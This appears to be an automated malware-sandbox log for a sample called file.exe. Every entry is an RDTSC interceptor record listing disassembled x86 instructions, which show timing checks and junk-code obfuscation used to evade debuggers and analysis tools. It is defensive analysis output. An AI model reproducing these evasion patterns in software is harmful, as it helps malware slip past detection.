Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2405A second address: B240BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0AD95F8828h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1D80h], ecx 0x00000028 push ebx 0x00000029 mov dword ptr [ebp+12450094h], eax 0x0000002f pop edi 0x00000030 mov ebx, ecx 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+1246257Ah], ecx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122DB8C3h], ecx 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0AD95F8835h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24F37 second address: B24F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24F3B second address: B24F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24F48 second address: B24FD2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0AD8C6A9B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F0AD8C6A9C7h 0x00000027 push 00000000h 0x00000029 add edi, 7ED3A103h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F0AD8C6A9B8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b sub edi, 6EFFF232h 0x00000051 mov bh, 15h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jbe 00007F0AD8C6A9B8h 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F0AD8C6A9BEh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25E96 second address: B25F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0AD95F8833h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov di, A1D5h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jmp 00007F0AD95F882Bh 0x00000037 push 00000000h 0x00000039 xor dword ptr [ebp+122DB8AFh], eax 0x0000003f push eax 0x00000040 pushad 0x00000041 push esi 0x00000042 jmp 00007F0AD95F8833h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F0AD95F882Ah 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26D9B second address: B26DA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26DA1 second address: B26DAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B260C1 second address: B26131 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F0AD8C6A9B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2E64h], ecx 0x0000002d mov bx, cx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jnp 00007F0AD8C6A9BCh 0x0000003d add dword ptr [ebp+122D1894h], ecx 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a or dword ptr [ebp+122D339Fh], edx 0x00000050 mov eax, dword ptr [ebp+122D10E9h] 0x00000056 sbb di, CE16h 0x0000005b mov ebx, dword ptr [ebp+122D2BDDh] 0x00000061 push FFFFFFFFh 0x00000063 stc 0x00000064 nop 0x00000065 pushad 0x00000066 jnc 00007F0AD8C6A9BCh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26EEC second address: B26F0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0AD95F8835h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26F0D second address: B26F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B26FD0 second address: B26FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2A176 second address: B2A17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B281C4 second address: B281C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2E34E second address: B2E352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2E352 second address: B2E36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD95F8835h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F1E0 second address: B2F1FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0AD8C6A9B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2A4A5 second address: B2A4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2C45E second address: B2C4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov edi, 2734DDEBh 0x00000016 sub dword ptr [ebp+122D1AB2h], esi 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov bx, CE72h 0x00000027 mov eax, dword ptr [ebp+122D04BDh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0AD8C6A9B8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 sbb bh, FFFFFF9Ah 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edx 0x0000004f call 00007F0AD8C6A9B8h 0x00000054 pop edx 0x00000055 mov dword ptr [esp+04h], edx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc edx 0x00000062 push edx 0x00000063 ret 0x00000064 pop edx 0x00000065 ret 0x00000066 nop 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3016A second address: B3016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D477 second address: B2D47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2E468 second address: B2E47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0AD95F882Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2C4E7 second address: B2C4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3016E second address: B301F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0AD95F8828h 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007F0AD95F8836h 0x00000014 jmp 00007F0AD95F8830h 0x00000019 nop 0x0000001a pushad 0x0000001b mov dl, C1h 0x0000001d mov dword ptr [ebp+122D339Fh], ebx 0x00000023 popad 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F0AD95F8828h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 xor dword ptr [ebp+122D1CF2h], edx 0x00000046 push 00000000h 0x00000048 sub dword ptr [ebp+122D34B1h], eax 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jmp 00007F0AD95F882Bh 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F0AD95F8833h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2E47C second address: B2E481 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B301F3 second address: B30200 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D557 second address: B2D55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D55B second address: B2D583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8833h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F882Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B350BF second address: B350CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B394BB second address: B394C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0AD95F8826h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF384 second address: ADF39A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF39A second address: ADF3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF3A2 second address: ADF3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C41 second address: B38C5E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0AD95F882Fh 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C5E second address: B38C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C62 second address: B38C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C68 second address: B38C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C6E second address: B38C78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38C78 second address: B38C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a jnp 00007F0AD8C6A9BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B38DC0 second address: B38DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F75D second address: B3F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F763 second address: B3F770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F770 second address: B3F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F776 second address: B3F793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F0AD95F882Fh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F793 second address: B3F7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F854 second address: B3F85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F85E second address: B3F893 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jnl 00007F0AD8C6A9B8h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e je 00007F0AD8C6A9DEh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0AD8C6A9BDh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F950 second address: B3F968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F968 second address: B3F96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43D98 second address: B43D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B441C8 second address: B441FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f push edx 0x00000010 je 00007F0AD8C6A9B6h 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b jmp 00007F0AD8C6A9C2h 0x00000020 pop ebx 0x00000021 ja 00007F0AD8C6A9BEh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B441FE second address: B44204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4436C second address: B44373 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B44373 second address: B4437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4437C second address: B44380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4476E second address: B44774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B44774 second address: B4477E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0AD8C6A9B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4477E second address: B4479D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0AD95F8836h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DC7B second address: B4DCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F0AD8C6A9BEh 0x0000000c pop ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DCA9 second address: B4DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DCAD second address: B4DCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DCB1 second address: B4DCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8831h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DCE2 second address: B4DCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4CD1D second address: B4CD27 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4CFE9 second address: B4CFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4CFED second address: B4D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8839h 0x0000000b pushad 0x0000000c jns 00007F0AD95F8826h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D173 second address: B4D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0AD8C6A9C9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D19A second address: B4D1A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D1A1 second address: B4D1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD8C6A9BFh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D4B2 second address: B4D4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0AD95F882Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DAF4 second address: B4DAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DAF8 second address: B4DB02 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4DB02 second address: B4DB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B50DA4 second address: B50DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55E42 second address: B55E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0AD8C6A9BAh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B177C4 second address: B177CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B17CF9 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD8C6A9BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D37EBh], edi 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov dx, 2BEBh 0x0000001d call dword ptr [ebp+122D3589h] 0x00000023 pushad 0x00000024 jng 00007F0AD8C6A9BCh 0x0000002a mov dword ptr [ebp+122D34B1h], eax 0x00000030 xor eax, eax 0x00000032 jmp 00007F0AD8C6A9BEh 0x00000037 add dword ptr [ebp+122D34B1h], ebx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 or dword ptr [ebp+122D34B1h], ebx 0x00000047 add dword ptr [ebp+122D34B1h], edi 0x0000004d mov dword ptr [ebp+122D29C9h], eax 0x00000053 mov dword ptr [ebp+122D34B1h], edi 0x00000059 mov esi, 0000003Ch 0x0000005e mov dword ptr [ebp+122D2E75h], edx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jg 00007F0AD8C6A9B7h 0x0000006e lodsw 0x00000070 jmp 00007F0AD8C6A9C2h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007F0AD8C6A9BEh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D34B1h], edi 0x00000088 push eax 0x00000089 pushad 0x0000008a push esi 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1808D second address: B180BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F0AD95F883Dh 0x00000010 pushad 0x00000011 jmp 00007F0AD95F882Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1833B second address: B18341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
